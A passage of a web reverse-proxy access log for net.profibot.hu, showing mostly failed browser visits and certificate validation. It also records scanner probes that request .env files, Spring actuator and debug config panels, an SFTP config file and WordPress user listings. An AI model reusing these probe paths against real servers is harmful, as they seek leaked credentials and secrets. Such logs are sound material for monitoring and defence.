"Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:54 +0000] - - 400 - GET http net.profibot.hu "/swagger-ui.html" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:54 +0000] - 502 502 - GET http net.profibot.hu "/actuator/env" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:55 +0000] - - 400 - GET http net.profibot.hu "/swagger/index.html" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:56 +0000] - - 400 - GET http net.profibot.hu "/swagger/swagger-ui.html" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:56 +0000] - 502 502 - GET http net.profibot.hu "/swagger-ui.html" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:57 +0000] - - 400 - GET http net.profibot.hu "/webjars/swagger-ui/index.html" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:57 +0000] - 502 502 - GET http net.profibot.hu "/swagger/index.html" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:58 +0000] - - 400 - GET http net.profibot.hu "/swagger.json" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:58 +0000] - 502 502 - GET http net.profibot.hu "/swagger/swagger-ui.html" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:59 +0000] - - 400 - GET http net.profibot.hu "/swagger/v1/swagger.json" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:05:59 +0000] - 502 502 - GET http net.profibot.hu "/webjars/swagger-ui/index.html" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:00 +0000] - - 400 - GET http net.profibot.hu "/v2/api-docs" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:00 +0000] - 502 502 - GET http net.profibot.hu "/swagger.json" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:01 +0000] - - 400 - GET http net.profibot.hu "/v3/api-docs" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:01 +0000] - 502 502 - GET http net.profibot.hu "/swagger/v1/swagger.json" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:02 +0000] - - 400 - GET http net.profibot.hu "/api-docs/swagger.json" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:02 +0000] - 502 502 - GET http net.profibot.hu "/v2/api-docs" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:03 +0000] - 502 502 - HEAD https net.profibot.hu "/" [Client 104.164.216.85] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.35/36 Safari/537.36" "-" +[31/Jan/2026:10:06:03 +0000] - - 400 - GET http net.profibot.hu "/api/swagger.json" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:03 +0000] - 502 502 - GET http net.profibot.hu "/v3/api-docs" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:04 +0000] - - 400 - GET http net.profibot.hu "/@vite/env" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:04 +0000] - 502 502 - GET http net.profibot.hu "/api-docs/swagger.json" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:05 +0000] - - 400 - GET http net.profibot.hu "/.vscode/sftp.json" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:05 +0000] - 502 502 - GET http net.profibot.hu "/api/swagger.json" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:06 +0000] - - 400 - OPTIONS http net.profibot.hu "/" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:06 +0000] - 502 502 - GET http net.profibot.hu "/@vite/env" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:07 +0000] - - 400 - GET http net.profibot.hu "/?rest_route=/wp/v2/users/" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:07 +0000] - 502 502 - GET http net.profibot.hu "/.vscode/sftp.json" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:08 +0000] - - 400 - GET http net.profibot.hu "/debug/default/view?panel=config" [Client 206.81.12.187] [Length 252] [Gzip -] [Sent-to ] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:08 +0000] - 502 502 - OPTIONS http net.profibot.hu "/" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:09 +0000] - 502 502 - GET http net.profibot.hu "/?rest_route=/wp/v2/users/" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:10 +0000] - 502 502 - GET http net.profibot.hu "/debug/default/view?panel=config" [Client 159.89.174.87] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[31/Jan/2026:10:06:14 +0000] - 502 502 - GET http net.profibot.hu "/" [Client 173.244.33.10] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:06:14 +0000] - 502 502 - GET http net.profibot.hu "/favicon.ico" [Client 173.244.33.10] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:06:14 +0000] - - 400 - GET http net.profibot.hu "/" [Client 146.70.11.5] [Length 654] [Gzip -] [Sent-to ] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:06:30 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:06:30 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:07:23 +0000] - 502 502 - HEAD https net.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:07:23 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:07:23 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:07:23 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:07:32 +0000] - 502 502 - HEAD https net.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:07:32 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:07:33 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:07:33 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:07:53 +0000] - 502 502 - HEAD https net.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:07:53 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:07:53 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:07:53 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:08:08 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 94.176.81.49] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" +[31/Jan/2026:10:08:08 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 206.204.28.42] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" +[31/Jan/2026:10:08:08 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 94.176.81.49] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "https://net.profibot.hu/" +[31/Jan/2026:10:08:08 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 206.204.28.42] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "https://net.profibot.hu/" +[31/Jan/2026:10:08:18 +0000] - 502 502 - HEAD https net.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:08:18 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:08:18 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:08:19 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:08:23 +0000] - 502 502 - GET http net.profibot.hu "/" [Client 192.175.111.244] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:08:24 +0000] - 502 502 - GET http net.profibot.hu "/" [Client 64.15.129.123] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:08:24 +0000] - 502 502 - GET http net.profibot.hu "/" [Client 192.175.111.237] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:08:25 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 192.175.111.245] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:08:25 +0000] - 502 502 - GET http net.profibot.hu "/" [Client 64.15.129.123] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[31/Jan/2026:10:09:19 +0000] - 502 502 - HEAD http net.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:09:19 +0000] - 502 502 - GET http net.profibot.hu "/" [Client 176.65.148.161] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:09:20 +0000] - 502 502 - HEAD http net.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:09:20 +0000] - 502 502 - HEAD http net.profibot.hu "/__rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:09:20 +0000] - 502 502 - HEAD http net.profibot.hu "/rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:09:22 +0000] - 502 502 - HEAD https net.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:09:22 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 176.65.148.161] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:09:22 +0000] - 502 502 - HEAD https net.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:09:22 +0000] - 502 502 - HEAD https net.profibot.hu "/__rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:09:23 +0000] - 502 502 - HEAD https net.profibot.hu "/rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:09:59 +0000] - 502 502 - HEAD http net.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:10:00 +0000] - 502 502 - GET http net.profibot.hu "/" [Client 176.65.148.161] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:10:00 +0000] - 502 502 - HEAD http net.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:10:00 +0000] - 502 502 - HEAD http net.profibot.hu "/__rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:10:00 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 146.70.203.23] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/172.1" "-" +[31/Jan/2026:10:10:00 +0000] - 502 502 - HEAD http net.profibot.hu "/rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:10:00 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 185.94.190.205] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:10:01 +0000] - 502 502 - HEAD https net.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:10:01 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 176.65.148.161] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:10:02 +0000] - 502 502 - HEAD https net.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:10:02 +0000] - 502 502 - HEAD https net.profibot.hu "/__rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:10:02 +0000] - 502 502 - HEAD https net.profibot.hu "/rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[31/Jan/2026:10:10:03 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 147.45.116.17] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Mobile/15E148 Safari/604.1" "-" +[31/Jan/2026:10:10:16 +0000] - 502 502 - HEAD https net.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:10:16 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:10:16 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:10:16 +0000] - 502 502 - HEAD https net.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to nginx-proxy-manager] "Python/3.13 aiohttp/3.11.18" "-" +[31/Jan/2026:10:11:12 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 147.45.116.17] [Length 154] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_0 like Mac OS X; tr-CY) AppleWebKit/534.2.3 (KHTML, like Gecko) Version/3.0.5 Mobile/8B119 Safari/6534.2.3" "-" +[31/Jan/2026:10:11:32 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:11:32 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to nginx-proxy-manager] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:14:08 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:14:08 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:14:10 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:14:10 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:14:17 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:14:17 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:14:52 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 147.45.116.17] [Length 154] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Mobile/15E148 Safari/604.1" "-" +[31/Jan/2026:10:16:50 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:16:50 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:16:51 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:16:51 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:17:53 +0000] - 502 502 - GET https net.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:17:54 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:10:20:58 +0000] - 502 502 - GET https net.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 